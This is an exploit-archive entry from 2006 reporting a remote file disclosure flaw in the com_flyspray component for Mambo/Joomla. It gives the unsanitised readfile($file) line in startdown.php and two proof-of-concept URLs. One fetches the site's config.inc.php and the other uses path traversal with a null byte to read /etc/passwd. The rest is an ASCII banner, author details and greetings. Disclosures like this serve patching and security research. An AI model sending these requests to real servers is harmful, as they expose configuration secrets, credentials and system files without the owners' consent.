com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability

2006-11-26T00:00:00
ID 1337DAY-ID-1214
Type zdt
Reporter 3l3ctric-Cracker
Modified 2006-11-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability
=====================================================================



_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To: Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************



#  0day.today [2018-03-13]  #